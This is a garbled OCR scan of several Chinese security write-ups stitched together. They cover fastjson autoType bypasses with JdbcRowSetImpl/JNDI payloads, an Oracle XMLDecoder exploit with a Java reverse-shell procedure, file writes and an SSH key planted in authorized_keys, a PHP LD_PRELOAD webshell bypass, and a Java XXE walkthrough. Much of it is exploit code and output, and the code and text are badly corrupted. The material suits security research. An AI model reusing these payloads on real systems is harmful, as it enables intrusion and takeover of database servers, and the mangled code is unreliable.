€ Classe?» checkAutoType(String typeName, Class<?> expectClass, int features) { 


f (typename length() < 128 && typeName. length() >= 3) € 
typeName. replace ( $t ) 


className.charAt(0)) * 1 ; 28211 UishayelassName {f shame, Lengtht) 
className = className,substring(i, className. length() 


ParserConfig > checkAutoType() 


S Variabies 


@ expectClass = null 
© features = 989 


BASIC = -3750763034362895679 
PRIME = 1099511628211 





绕 过 ! 


LLcom.sun.rowset.JdbcRowSetImpl;; 
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a 
clazz = TypeUtils. loadClass(typeName, this,defaultClassLoader 


lazz: “class com. sun. rows 
{TypeUtils.getAnnotation(clazz, JSONType.c} 


eckAutoT ype(} 


= Variables 


ps5 


expectClass = null 


clazz = {Cle ‘class com.sun.rowset.JdbcRowSetimpl 
|| BASIC = -3750763034362895579 

W PRIME = 1099511628211 

r 2666600581339127221 

ép this.propertyNamingStrategy = null 

& this.defaultClassLoader = null 








V1.2.43 


补丁 
#7 PiazitypeNameA LL.;; ， 便 会 抛 出 异常 然后 退出 。 


?> checkAutaType(String typeName, Class«?» expectClass, int features) { 
x ) 


peName. Length() < 128 && typeName.length() >= 3) ( 
assName = typeName. replace ( E 
> clazz = 





[com. sun. rowset . JdbcRowSet Impl 


因为 我 们 最 早 看 到 loadclass 会 去 掉 的 不 仅仅 是 L 和 ; ， 还 有 [ ， 但 是 实际 测试 下 来 无 法 成 功 。 


c Class<?> loadClass(String className, ClassLoader classLoader, cache) { 
(className != && className. length() != @) { 
Class<?> clazz = (Class)mappings.get(className) ; 
(clazz | 
dB SEPT Ze Se CR - 
(className, charAt (90) 

Class«?» componentType = loadClass(className.substring(1), classLoader); 
return. Array.newInstance (componentType, | length. 8).aetclass O ;] 

2 (className.startsWith("L") && className.endsWith(";")) { 
String newClassName = className.substring(1, className.length() ~ 1); 

€ ! loadClass(newClassName, classLoader); 


‘apache. ibatis.datasource. jndi. JndiDataSourceFactory", "properties": 
ce": "rmi://localhost :1099/Exploit"}} 





RURY IR 


1astison/ 洲 码 /fastison-1.2.45/src/main/jova/com/olibabo/fostson/parser/ParserConfig java E /lastikon/383/fostison- 1.2 46/stc /moin/java/com/olibabo/fastison/parser/Porse: 





t sson à 
进入 到 
com. 
com.s 
$ 
Ray 
v1.2.47 


我 们 都 知道 fastjson 会 使 用 checkAutoType 方法 来 检测 Gtype 中 携带 的 类 ， 而 这 次 bypass 看 到 
payload 主 要 用 到 的 是 java.lang.class ， 在 


comlalibaba/fastjson/parser/DefaultJSONParser 方法 中 调用 checkAutoType 方 法 来 进行 检测 ， 
这 里 传 入 的 类 就 是 我 们 用 到 的 java.lang.class 。 


.DEFAULT TYPE KEY && 
le: can’ u 


ONParser parsed 


= Variables 
re 
" 





而 这 里 用 到 的 java.lang.class 并 不 在 我 们 的 黑 名 单 类 中 ， 因 此 这 里 的 黑 名 单 检测 是 通过 的 ， 然 
后 就 和 之 前 流程 一 样 调用 deserializer.deserialze 来 处 理 我 们 传 入 的 clazz， 也 就 
是 java.lang.class 。 而 这 里 对 应 的 deserialze 方 法 和 之 前 的 触发 稍微 有 一 点 点 区 别 ， 这 里 的 


deserialze 用 的 是 


com.alibaba.fastjson.serializer.MiscCodec#deserialze q 
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ObjectDeseriali ese rom *cónfig.getDeseríalizer(clazz) 
Class deserClas eserial jetClass(}; 
r isAssignableFrom(deserClass) && deserClass != JayiBeanDeserializer. && deserClass 


1 





his, clazz, fieldName) |: désérializers MYSCCOMPGOO1A  CUMBEIUEE 





进入 到 com.alibaba.fastjson.serializer.MiscCodec#deserialze ， 这 里 会 调用 


com.alibaba.fastjson.parser.DefaultJSONParser#parser 方法 来 取出 我 们 传 入 的 恶意 类 


com.sun. rowset.JdbcRowSetImpl 


eturn value; 

4 

String stringLiteral = lexer.stringVal(); 

lexer.nextToken( : 16) 
(lexer. isEnabled( Feature. AllowISO8601DateFormat)) { 
JSONScanner isoB8601Lexer = new JSONScanner(stringLiteral) 


Date varil 
{ Ri 
(!isoB601Lexer. scanIS08601DateIfMatch()) 1 


bypass zl 
2 { 
二 f (!(objVal in of String)) ( 
来 进行 检测 if (objVat JSONObject) { 


JSONObject jsonObject = (JSONObject)objVal; 
f (clazz == Currency.ciass) { 
String currency = jsonObject.getString( 
(currency != null) { 
f Currency.getInstance(currency); 


forName(strVal): 


ONParser@572} 
@320} "class java.lang.Class" : 








classloader} 


loadClass (className) 


gS. put{className, clazz) 





我 们 看 到 放 到 mapping 之 前 有 个 if 判 断 ， 如 果 cache 为 true 的 情况 下 ， 就 把 这 个 东西 放 到 mapping 
中 ， 而 这 里 的 cache 实 际 上 默认 就 是 为 true 的 。 


Class<?> loadClass(String className, ClassLoader classLoader) 
loadClass(className, classLoader, ae 





而 这 里 再 回 到 checkAutoType 中 ， 我 们 再 看 看 这 个 名 单 检 测 ， 截 取 一 下 部 分 代码 ， 理 一 下 思路 ， 
如 果 我 们 当前 mapping 中 存在 恶意 类 ， 那 么 这 里 会 从 mapping 中 取出 恶意 类 赋值 给 clazz， 然 后 因为 
9-14 行 代码 中 clazz 不 为 空 ， 所 以 这 里 直接 返回 了 恶意 类 。 











S09 


(clazz null) { 


clazz = TypeUtils.getClassFromMapping( typeName) ; 


null) { 
1is.deserializers. findClass( typeName ) ; 


(clazz != null) { 


if (expectClass !- && clazz != HashMap.class && !expectClass. isAssignableFrom(clazz)}) { 
ew JSONException( “type not match. " + typeName + " -> " + expectClass.getName( }); 


return clazz; 

} 

} else { i 

if (!this.autoTypeSupport) { HET SAFES A autoTypeSupport | 
hash = h3; 


for(i = 3; i < className.length(); ++i) { 
char c = className.charAt(i) 
hash ^= (long)c; 
hash *= 1099511628211L; 
if (Arrays.binarySearch(this.denyHashCodes, hash) >= 0) { 
throw new JSONException("autoType is not support. " + typeName ) ; 





qmm got um cete n] ten te n pm nen 


当然 最 后 的 结果 也 是 验证 了 猜想 ， 这 里 直接 就 返回 恶意 类 com.sun. 


rowset.JdbcRowSetImpl o 
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mapping 


lassLoader) 


里 一 下 思路 ; 


z, TAREA 


im(clazz)) i 
getName( ) ) 












获 后 后 面 就 和 之 前 的 利用 方法 一 样 了 。 
补丁 
外 和 1.48 的 差别 首先 将 loadClass 中 的 默认 true 修 改 成 为 了 fasle。 


FIAKRO tosson) 248" 
NR 上 7 > 


) 
M(pathClass 1= null){ 
return pathClass. ish 


) 
return faise 


public static Class<?> getCiassfromMapping 
return mappings get (className) 





然后 就 是 增加 更 多 的 黑 名 单 。 


- 0x03 小 结 


目测 来 看 fastson 的 otype 能 够 指定 实例 化 对 象 是 它 的 一 个 特性 ， 这 个 特性 可 能 存在 一 系列 的 风 
lu 随 着 Java 生 态 不 断 引 入 第 三 方 组 件 的 情况 下 ， 就 有 个 可 能 出 现 新 的 绕 过 。 从 业务 上 来 说 我 觉得 
能 是 儿 全 的 ， 一 般 对 于 业务 来 说 ， 你 能 提 仙 son 解 对象 获取 即 可 ， 我 不 大 


这 个 功能 的 初 训 在 哪里 。 
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Sena ; i ; : 
public void throws Exception { g b 
String payload="{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.p 
String payload 2 = "{\"@type\":\"com. sun. rowset . JdbcRowSet Imp1\",¥ 
try ( 


JSON.parseObject(payload); 
} catch (Exception e) ( 
error - e; 


try { 

JSON. parseObject(payload_ 2); 
} catch (Exception e) { 

erron2 = e; 


public void 


String f2 = "{\"@type\' 





Throwable error = null; 
try £{ 
JSON.parse(f2, config); 
} catch (JSONException ex) ( 
error = ex; 
} 


assertNotNull(error); 


public void test 3() throws Exception ( 
String f2 < "{\"@type\":\"java.net.InetAddress\",\"val\":\"baidu. com 


Throwable error = null; 
try { 
JSON.parse(f2, config); 
} catch (JSONException ex) { 
error = ex; 


P. 


assertNotNull(error); 


我 们 看 到 阿里 的 fastjson 在 测试 修复 的 时 候 ， 将 一 些 测 试 payload 携 带 了 进去 ， 从 commit 记 录 来 看 2 
年 应 该 就 修复 了 。 但 是 怎么 说 呢 ， 这 些 信息 留 在 这 里 始终 是 不 好 的 。 


Reference 
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Oracle 数 据 库 安全 思考 之 xml 反 序列 化 
前 


在 测试 过 程 中 ， 碰 到 oracle 数 据 库 ， 只 发 现存 在 一 个 低 权限 用 户 dm， 由 于 权限 不 足 无 法 进一步 获 
关键 数据 ， 同 时 无 法 进一步 获取 系统 权限 。 


m} 






主机 场景 : 

运行 服务 器 ; centos 6.5 

数据 库 版 本 : Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Pr 
低 权限 用 户 :TESTER 

能 够 访问 SQLPLUS 终 端 ， 也 可 以 使 用 PL/SQL 工 具 连 接 。 


XML 反 序列 化 


XML 反 序 列 化 ， 可 以 描述 一 个 Java Object， 以 及 用 来 构建 Object 时 所 需要 调用 的 方法 和 相关 参数 。. 
在 Oracle 中 ， 使 用 XMLDecoder 类 重新 组 装 XML 序 列 化 后 的 对 象 ， 而 在 组 装 过 程 中 所 调用 的 对 象 方 
法 ， 没 有 被 Oracle JVM 限 制 权 限 。 因 此 ， 可 以 使 用 XML 反 序 列 化 构建 一 个 FileWriter 对 象 ， 并 调用 
其 write 方法 ， 就 可 以 实现 文件 写 入 操作 。 


一 、Java 存 储 过 程 


Oracle 企 业 版 在 数据 库 中 嵌入 了 Java 虚 拟 机 ，Oracle 数 据 库 通过 Java 存 储 过 程 支持 Java 的 本 机 执 
行 ， 存 储 过 程 是 发 布 到 SQL 并 存储 在 数据 库 中 以 供 一 般 使 用 的 Java 方 法 。 调用 存储 过 程 


Apohoations 


Oracie Database 
hie: epi 


YYY 


in 
在 互通 性 上 面 ，Oracle 数 据 库 中 的 Java 完 全 符合 Java 语 言 规范 (JLS) ， 并 提供 了 通用 的 ， 面 向 对 


象 的 编程 语言 的 所 有 优点 。 另 外 ， 与 PL/SQL 一 样 ，Java 提 供 对 Oracle 数 据 的 完全 访问 权限 。 结 
果 ， 任 何 用 PL/SQL 编 写 的 过 程 也 可 以 用 Java 编 写 。 


二 、 通 过 SQL 终端 查询 java 版 本 
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create function get java property(prop in varchar2) returp varchar2 is language 


A > 
4 mo- 
get java propertylprop in varchar2) 


ava. lang. System. getProperty(java.lan 


4 JVM 的 基本 保护 


T scan off 


feate or replace and compile java source named ReverseShell as 

t java.io.*; 

€ class ReverseShell{ 

lic static void getConnection(String ip, String port) throws InterruptedEx 
—Runtime r = Runtime.getRuntime(); 

T Process p = r.exec(new String[]("/bin/bash","-c","0«&126-;exec 126<>/dev/t 
— system.out.printin(p.toString()); 

_ p.waitFor(); 


A 


Por replace procedure reverse shell (p ip IN VARCHAR2,p port IN VARCHAR2) 
age java name 'ReverseShell.getConnection(java.lang.String, java.lang.St 
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由 于 Oracle JVM 实 现 了 基于 细 粒 度 策略 的 安全 性 来 控制 对 OS 和 文件 系统 的 访问 ， 因 此 该 方法 将 
起 作用 。 从 低 权限 帐户 执行 此 过 程 会 导致 错误 。 


SQL> exec reverse shell('16.16.16.5°,°7777'}; 
Exception in thread “Root Thread" java.security.AccessControlException: the 
Permission (java.io.FilePermission /bin/bash execute) has not been granted to 
TESTER. The PL/SQL to grant this is dbes java.grant permission( 'TESTER', 
"SYS: java.io.FilePermission', ‘/bin/bash', ‘execute’ } 

at 
java. security.AccessControlContext.checkPermission(AccessControlContext. java: 387 
) 





at java.security.AccessController.checkPermission(AccessController.java:581) 
at java. lang. SecurityManager.checkPermission(SecurityManager . java:534) 
at 
oracle. aurora. rdbms, SecurityManagerlIepl.checkPermission(SecurityManagerImpl. java 
1216) 


at java. lang. SecurityManager.checkExec(SecurityManager. Java: 781) 
at java. lang.ProcessBuilder.startiProcessBullder.java:475) 


at java. lang. Runtime. exec (Runtime. java: 593) 

at java. lang. Runtime. exec(Runtime. java: 466) 

at ReverseShell.getConnect ion (REVERSESHELL : 13) 
BEGIN reverse shell('16,16.16.5°,°7777'); END; 


tr mmm 


LÀ 


ERROR at Line 1: 
ORA-29532: Java call terminated by uncaught Java exception: 
java.security.AccessControlException: the Permission (java.io. FilePermission 
/bin/bash execute) has not been granted to TESTER. The PL/SQL to grant this is 
dbms java.grant permission( ‘TESTER’, ‘SYS: java.io. FilePermission’, 
*/bin/bash’, ‘execute’ ) 

: at “TESTER. REVERSE SHELL", Line 1 

; at Line 1 


— A D 





请 注意 ， 错 误 堆 栈 包 含 缺少 权限 和 必要 的 命令 才能 授予 访问 权限 ORA-29532: Java call terminated 
by uncaught Java exception 


四 、XML 反 序列 化 带 来 的 问题 


XML 反 序 列 化 Java 中 存在 XML 序列 化 和 反 序 列 化 功能 ， 以 支持 使 用 标准 化 格式 (在 本 例 中 为 XMU) 
的 跨 平台 信息 交换 。 为 此 ，java.beans 库 包含 两 个 类 : XMLEncoder 和 XMLDecoder， 它 们 用 于 将 
Java 对 象 序列 化 为 XML 格式 ， 并 在 以 后 反 序列 化 该 对 象 。 典型 的 反 序 列 化 漏洞 依赖 于 接受 和 反 序列 
化 任意 输入 的 服务 的 存在 。 但 是 ， 如 果 有 权 访 问 可 以 在 用 户 架 构 中 创建 对 象 的 低 特权 Oracle 帐 户 
(具有 连接 和 资源 的 用 户 ) ， 则 可 以 创建 反 序 列 化 存储 过 程 。 例如 : 创建 一 个 账号 TESTER， 只 角 
有 CONNECT、RESOURCE 权 限 。 

SQL> select user from dual; 


SQL> select granted role from user role privs; 


GRANTED ROLE 





创建 了 以 下 Java 类 " DecodeMe” 和 一 个 调用 该 类 的 Java 存 储 过 程 : 
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create or replace and compile java source named DecodeMe as 
import java.io.*; 

import java.beans.*; 

public class DecodeMe{ 


Object object - decoder.readObject() 
System.out.println(object.toString()); 
decoder .close(); 


w 


e. 


CREATE OR REPLACE PROCEDURE decodeme (p xml IN VARCHAR2) IS 
language java name 'DecodeMe.input(java.lang.String)'; 


(S 





compile java source named Dei 


ll terminated 


| 中 为 XML) 
> 们 用 于 将 

2 受 和 反 序 列 
acle 帐 户 
TER, Ril 


^ (p xml . IN VARCHAR?) .IS 
> anput( java.lang.String) 
19 11 12 13 14 15 





DERRRASS, 该 块 将 简单 地 调用 printin 将 数据 输出 到 终端。 
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public static void input(String xml) throws InterruptedException, IOExceptic 


XMLDecoder decoder = new XMLDecoder ( new ByteArrayInputStream(xml.getByte 


tring xml) throws IntertuptedException, IOException { 


fer ( new ByteArrayInputStream(xml getBytes() ) 


该 
MP ISES XM grat avat CER SE 并 执行 所 提供 的 指令 。 可 在 此 处 找到 有 关 序 列 化 


BEGIN 

decodeme('«?xml version="1.0" encoding-"UTF-8" ?> 
«java version="1.4.0" class-"java.beans.XMLDecoder"» «object class="java. lang Me 
«void method-"println"» 

<string>This is test output to the console</string> 
</void> 





</object> 
</java>'); 
END; 

/ 


SQL> set serveroutput on 
SQL> exec dbms java.set output (10068) ; 





PL/SQL procedure successfully completed 


SQL> BEGIN 
decodeme( ‘<?xml versiíons"1.0" encoding="UTF-8° ?> 
<java version="1.4.6" class="java.beans.XMLDecoder”> 
<object class="java.lang.System”® field="out"> 
<void method="println"> 
«string»This is test output to the console</string> 
«/void» 
</object> 
</java>‘); 
END; 
Zo. 3 4 5 6 7 8 
This is test output to the console 
java.io.PrintStream@l1e28897 


PL/SQL procedure successfully completed. 





反 序 列 化 过 程 将 会 绕 过 JVM 权 限 设置 ， 并 允许 用 户 在 OS 上 任意 写 入 文件 。 请 参见 以 下 示例 脚本 : 


BEGIN 
decodeme( ' 
«java class="java.beans.XMLDecoder" version="1.4.0" > 
<object class="java.io.FileWriter"> 
<string>/tmp/test.txt </string> 
<boolean>True</boolean> 
<void method="write"> 
<string>test</string> 
</void> 
<void method="close" /> 
</object> 
</java>'); 
END; 
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"Java, lang. g, 





示例 脚本 : 





执行 





是 述 脚本 将 在 /imp 文件 夹 中 创建 一 个 名 为 "testtxt 的 文件 : 


jemel <?xml version="1.0" encoding="UTF-8":?> 
<java version="1.4.0" class="java. beans. xX? 
<object classs"java.io.FileWriter"» 
«string»/ /test.txt«/string» 
2 3 4 5 6 
<vold method«"write"> 
«string»Why for the love of god?«/stt 
«/void» E 
«void method="close” /> 
</object> 
</java>'); 


«boolean»True«/b 


9 10 11 12 
Fi leWwriter@9a69562a 


edure successfully completed. 


> OralInstalt2619. 

8 Oralnstall2019. 

) OraInstall2619- 

} OraInstalt2019- 

SG OraInstall2619. 
Oralnstall2019- 
OraInstall2619- 
OraInstalt2619.- 
OraInstall2619. 

y OraInstalt2619- 
OralInstalt2619- 
OraInstali2619- 

29 Orainstalil2019. 

32 OraInstall2619- 

i orbit-gda 
orbit-oracle 
orbit-root 

3 pulse. 4i9valoKF Dt 
pulse. HLgfRayll 7yb 

pulse-SoHytewib4tl 
t txt] ; 
jirtual oracle .3vYwv1 

:21 virtual-root, 8Nb2y5 
8 01:04 yum. log 





AI IRI, ALAR STRIS ERLEA AA 事实 证 明 ， 不 仅 可 以 将 
村 广 作 写 民 系统 ， 还 可 以 覆盖 或 附加 Oracle 用 户 具有 写 许可 权 的 任何 文件 。 


监 会 对 数据 库 产 生 严 重 影响 ， 因 为 攻击 者 可 能 会 覆盖 关键 文件 (包括 控制 文件 ， 这 可 能 会 
的 拒绝 服务 攻击 或 数据 损坏 。 但 是 ， 通 过 精心 设计 的 有 效 payload (pl/sql 脚 本 ) ， 使 用 此 
POWER EW Oracle pa p: 的 身份 访问 服务 器 。 


有 SS 不 服务 器 上 打开 并 配置 为 接受 RSA 连 接 ， 则 以 下 有 效 负载 会 将 RSA 令 牌 附加 到 管理 数据 库 


Qracle 帐 户 中 。 开始 认证 密 铂 : 
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BEGIN 
decodeme(' 
«java class="java.beans.XMLDecoder" version="1.4.0"> 
<object class-"java.io.FileWriter"» 
<string>/home/oracle/.ssh/authorized k 
<boolean>True</boolean> 
«void method="write"> 
<string>ssh-rsa AAAAB3NZaC1yc2EAAAADAQI 
«/void» 
«void methodz"close" /» 
«/object» 
«/java» 
PE 
END; 


执行 后 ， 该 代码 会 将 任意 RSA 密 钥 附加 到 Oracle 用 户 的 authenticated_keys 文 件 中 ， 以 Oracle 用 户 
的 身份 授予 对 SSH 的 攻击 。 


Oracle Database 17c Enterprise Edition Release 12.2.0.3.6 - 64bit Production 


SQL> set serveroutput on 
SQL» exec does fava set output | 1e0ee); 


PL/SOL procedure successfully completed 


GI IM DIT PEE M inge'uTF.à* ?» 
ITE 4.0° classet java. beans. XML Decoder "> 
ssa” java.io. Filewriter*> 
g>/home/oracte/.ssh/authorized keys</string> 
xix An^»True«/boolean» 
void methode*write*> 
«stringssshersa AAAABJNZAaCIyC2EAAAADAQABAAABAQCe QKOPeo J 1 Ue JEMEZ VK 1 uM AX BKONB F: 
cóVrwxRS 2 HEgaACVOdhacOX7klyOwr J)ceGQq1CcC206K e / VeL XxaE2sc )pRZWL c JONCOZMA fnlh1bq9 Maeda 5L QL30Mqr X2 2ea2d f Noh Sd SaL DT. 
HKrOGKEQIwMCV/ede/ OKANO f Ue Ok 4KuCn3MQUN1HwoqoC c TROD rBDOYANM x qpBv9 rOneCdvaS«tqi Sesh ]NitviYzJObolz 
CKoBPrxaüsfiípsEIMSaPu9xvA9OXgsakhg4yoy9 3  FinESexanviOXSOoMylxidqeWGOva SAvhAAGLXxOC 
</void> 
«void methode'close" /» 
«/object» 


«/ java» 
M 


END; 
6 ? 8 9 
java. iœ. Filewriterĝf?2894268 


PL/SQL procedure successfully completed 


foracle@localhost ~]$ ls ,ssh/ 

puthorized keys 

foracle@localhost ~}$ cat .ssh/authorized keys 

bsh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCedKQPeoJ 1Ue JEW6ZVk LUWAXBKWEF 4 f COV rwxRSHEgaAcVodhgcó» 
mihíbq9IWMHOdnSLqL3QMqrXz2«a2d f NohSdSmLDTaFHKzOGKEQIVWHCYV/e4e/eKnmo f UWHELOk4KuCn 3MOUN LHWwOd 
MEE ere eor n PT TERIS he ON QI 
host -]$ 
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可 以 以 SYS 身份 访问 数据 库 ， 进 而 管理 整个 数据 库 。 


$ ssh oracle@192.168.0.51 
fri Jan 19 17:14:43 2018 from 192.168.1.238 
root can do that 
="1.4.0"> y root can do that 
thost -]$ whoami 


ocalhost -]$ . oraenv 

ip = {oracle} ? POC1 

e e been set to /u@l/app/oracle 
ca ~}$ sqlplus / as sysdba 


authorized k 


1yC2EAAAAD AQ Release 12.2.6.1.8 Production on Fri Jan 19 18:66:48 2618 


c) 1982, 2016, Oracle. All rights reserved. 


stabase 12¢ Enterprise Edition Release 12.2.8.1.6 - 64bit Production 


ser from dual; 


以 Oracle 用 户 


五 、 绥 解 措 施 : 


建议 着 级 补丁 版 本 : 12.2.0.1.180717 (p27923353 122010 Linux-x86-64.zip) 


w BF: 


Atip:/obtruse.< 





webshell 绕 安全 模式 执行 命令 
工具 下 载 地 址 


https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD 
下 载 下 来 是 下 图 的 这 些 文 件 


> ma > bypass disablefunc via LD PRELOAD-master 3 = 好 


tåke v 


RE sees eor B 








WES — 
访问 的 位 置 bat 
bruce_lee.jpg bypass disablef| bypass_diseblef — bypass disablef — bypass disablef D fÉ.png disable function README.md Y 
unc.c unc x64.so unc x86.so s SARMI 
函数 .png 
= ane 

— m- EE 
| : ~ 
| : 成 功 绕 过 物 云 png E 无 法 使 用 FERN dn 

disable_function disable function sendmail.png 令 .png 
s.png s 成 功 执行 命令 . 
png 


主要 就 是 这 三 个 文件 ，64 位 的 则 用 x64，32 位 的 用 x86。 将 bypass_disablefunc.php 和 
bypass_disablefunc_x64.s0 上 传 至 目标 服务 器 


phpinfo. php 





D544 
Sm - 5 1 
bypass disablefunc x64 so 0644 3f 
roc a 
Six. php 07s 
bypass_disablefunc. php 04 





| http: //demo.xxxxx.com/Upload/file/bypass disablefunc.php?cmd-whoami&outpath-/ 


| cmd 参 数 : 执行 的 命令 
| outpath š: 执行 的 命令 保存 在 该 文件 里 
sopath: 上 传 的 bypass_disablefunc_x64.so 路 径 


每 次 执行 的 时 候 ， 等 待 的 时 间 插 长 的 执行 : 


http://demo.xxxxx.com/Upload/file/bypass disablefunc. php?cmd=whoamigoutpath=/ 


成 功 获取 到 了 当前 用 户 权限 
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sues Gum Co»mmu Brome : y mom 
tp.//site.com/bypass disablefunc.php?cmd- pwd&outpath - /tmp/xx&sopath- /var/www/bypass disablefunc x64.so 
: > fwww[vwwtroot/demo. =a “ yfUpload/filefoe 2» &1 


j/wwwroot/demo. = == w, Upload/file/xx 2» &1 


php 


name -a 命 令 


yo i a Wt sense tees got test tis AAA d 
jisa SML incphi PENE jeune ime -å 





MSS See LO URN ES sm 
J[site.com/bypass disablefunc.php?cmd = pwd&outpath = /tmp/xx&sopath = /var/vww/bypass disablefunc x64.so 





> /www/wwwroot/Cosm s. = »/Upload/file/xx 2» &1 


aldomain 3.10.0-327.el7.x86_64 #1 SMP Thu Nov 19 22:10:57 UTC 2015 x86 64 x86 64 x86 64 GNU/Linux 
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Java 下 的 xXE 漏 洞 
0x01 起 因 


同事 问 我 研究 过 Java 下 的 xxe 漏 洞 嘛 ， 为 啥 修复 建议 不 起 作用 ，emmmm 然 后 这 个 问题 我 就 回答 
上 来 了 ， 这 个 问题 有 两 个 关注 点 : 


1.java 下 xxe 产 生 的 原理 是 哈 。 
2. 修 复 建 议 的 修复 代码 是 哈 。 


0x02 深入 分 析 


1.DocumentBuilder 
原理 分 析 
测试 代码 : 

package com.link3r.xxe.javaxxe; 


import org.w3c.dom.Document; 
import javax.xml.parsers.*; 





rt java.io.ByteArrayInputStream; 
import java.io.InputStream; 


t 





public static void throws Exception { 
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); 
DocumentBuilder db = dbf.newDocumentBuilder(); 
String str = "<!DOCTYPE doc [ \n" + 
"<lENTIT 127.0.0.1:8888\">\n" + 
InputStream is = new ByteArrayInputStream(str.getBytes()); 
Document doc = db.parse(is); 


在 db.parse 处 下 个 断 点 ， 代 码 来 到 这 个 Java.xml.parsers.DocumentBuilder#parse 类 中 , M 
进 return parse 。 
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Document parse(InputStream is) 
SAXException, IOException { 
(is = iL) ( 
» new IllegalaArgumentException("InputStream cannot be null"); 


tnputSource in .s.new InputSource(is); 
parse(in); | 


#pocumentBuilderlmpl#parseP , 调用 了 DOMParser#parse 


Document parse(InputSource is) throws SAXException, IOException { 
(is == wit) { 
4 ILlegalArgumentException( 
DOMMessageFormatter. formatMessage(DOMMessageFormatter. 
[.— "jaxp-null-input-source", GHB null ) ); 


(fSchemaValidator != nulli) { 
(fSchemaValidationManager != null) { 
fSchemaValidationManager. reset(); 
fUnparsedEntityHandler. reset (); 


resetSchemaValidator(); 


domParser.parse(is); | 

Document doc = domParser.getDocument(); 

jomParser.dropDocumentReferences(); 
doc; 


tet DOMParser#parse 这 个 方法 ， 调 用 parse 方法 来 解析 xmllnputSource 。 


{ parse(InputSource inputSource) 
SAXException, IOException { 


e document 


f 
{ 


XMLInputSource xmlInputSource = 
XMLInputSource(inputSource.getPublicId(), 
inputSource.getSystemId(), 

CEED nui); 
xmlInputSource.setByteStream(inputSource.getByteStream()); 
xmlInputSource.setCharacterStream(inputSource.getCharacterStream()); 
xmlInputSource. setEncoding( inputSource.getEncoding()); 
parse(xmlInputSource) ; 


Hi XMLParser#parse ， 调 用 fConfiguration.parse 方法 。 


barse(XMLInputSource inputSource) 
XNIException, IOException { 
indicates that the parser is called directly, initialize them 
SecurityManager == null) { 
SecurityManager = new XMLSecurityManager ( GEBEREEEEEBIEED true); 
fConfiguration, setProperty(Constants. , securityManager) ; 


SecurityPropertyManager == null) { 
tecurityPropertyManager = new XMLSecurityPropertyManager() ; 
Configuration. setProperty(Constants. or eae TA TyF oper tynanager]; 


Seti}. 


"-Onfiguration. parse( inputSou rce); 


而 这 i 
ww fConfiguration parse 实际 上 是 个 继承 接口 ， 这 里 根据 debug 会 进 
figUration#parse 中 。 





public void paprs@(XMLInputSource inputSource) 
throws XNIException, IOException; 


Choose Implementation of parse (8 methods found) 


/: @ DoMConfigurationImpl (c nec dom) :8 > (rt jarf Be 
: @ oWConfiguration (ci org. apache. xerces. internal. parse! < 1.8 > (rt.jar} ie 

pata ar a Sc apa (com. sun.org. apache. xerces. internal. parsers < 1.8 > (rt.jar) IN 
’ a SchemaParsingConfig {c nt à int s.opti) « 1.8 > t. jar) i 
, |@ xnL11configuration rs) | < 1.8 > jar ie 
» O Wii Tent iguration (Com. su y ern ) < 1.8 > (rt. jar) ie 


(rt. ES o 
public void parse(XMLInputSource source) throws XNIException, IOException { 


if (fParseInProgress) { 

// REVISIT - need to add new error message 

throw new XNIException("FWK005 parse may not be called while parsing."); 
) 
fParselnProgress = true; fParseInProgress: true 





Variables 


= 
$ ; 


> © source = 0 
tw fParseinProgress = true 


通过 setInputSource(source) 方法 将 Xml 数据 赋值 给 flnputSource ， 然 后 调 
用 parse(boolean complete) 构造 方法 进行 处 理 。 


public void setInputSource(XMLInputSource inputSource) 
throws XMLConfigurationException, IOException 1 


// REVISIT: this method used to reset all the components and 
construct the pipeline. Now reset() is called 
in parse (boolean) just before we parse the document 
Should this method still throw exceptions..? 


RNAI EBON HARTI 


> inputsource; 
Ronee cay Cae A 


p EU. 





跟 进 parse(boolean complete) 方法 ， 然 后 就 来 到 
了 XMLDocumentFragmentScannerImpl#scanDocument 方法 中 。 


} catch (XNIEXception ex) { 
Lf. ( 
ex. printStackTrace(); 


PR XMLDocumentFragmentScannerImpl#scanDocument 方法 ， 这 个 方法 首先 会 针对 xml 数 据 流 
中 的 document 部 分 进行 扫描 。 








> 


int event = next();. event: 7 












o { 
Lcase XMLStreamConsta | 
| ocumentHandte tyManager.getEntityScanner(), fE 
rt.jar) e | break; 
1 : | 
rt. jar) 和 | y 
tane | TARMURI DTD 部 分 。 
由 
Me. hi | case XMLStreamConstants. : 
aom | //all DTD related callbacks are handled in DTDScanner. 
EK //1. Stax doesn't define DTD states as it does for XML Document. 


t.jar) Be //theref don't need t 





TERG ELEMENT 部 分 。 


= XMLStreamConstants. H 
" rf Systiti out.println(" in scann element"); 
//fDocumentHandler.startElement(getElementQName();,fAttributes,null); 


"em OUT. PY "eT after calling next"); 
(event !=xXMLStreamConstants. && complete); 


iit XMLDocumentFragmentScannerimpl#next ， 这 个 方法 会 针对 一 些 特殊 字符 进行 标记 。 


fScannerState) { 


ch = fEntityScanner.peekChar(); ch: 
«*) x 
fEntityScanner.scanChar(); 
tScannerState( 


ent content is there.. 
etScannerState( 


D 


而 我 们 刚刚 payload: <doc>&xxe;</doc> 里 面 存 在 & 特殊 字符 ， 所 以 这 里 会 调用 
SetScannerstate 构造 方法 将 fScannerstate 设置 为 SCANNER STATE REFERENCE 。 





final void 


‘ScannerState = statei ) 
jet 
System. „print ("see setScannerState: "); 
//System, vui: print(fScannerState); 
System.” eprint ( gg nane( state) ); 


System. “sprinting 





代码 继续 往 下 走 ， 会 来 到 XMLDocumentFragmentScannerimpl#next 方法 中 的 下 代码 位 轩 
我 们 已 经 知道 这 时 候 的 fscannerState 是 SCANNER STATE REFERENCE ,所 以 站 


应 该 要 来 到 SCANNER_STATE_REFERENCE 中 。 


case XMLEvent. 
eturn XMLEvent. 


case 


MEVS this t ion retur ent is empty.. can be linked to end element event. 
/return f 1 
TEaptyELenent = scanStártE lene "T ; 
//if the element is empty the next event is “end element” 
if( fEmptyElement) { 
setScannerState( n 
IE 
//set the next possible state 
setScannerState( 


n XMLEvent. 


foundBuiltInRefs = 


//we should not clear the buffer only when the last state was either CDATA or 
//SCANNER STATE CHARACTER DATA or SCANNER STATE REFERENCE 
if(fIsCoalesce && ( fLastSectionWasEntityReference || fLastSectionWasCData || fLastSectio 
//fLastSectionWasEntityReference or fLastSectionWasCData are only 
//used when fisCoalesce is set to true. 
fLastSectionWasEntityReference = tru 
fLastSectionWasCData = false; 
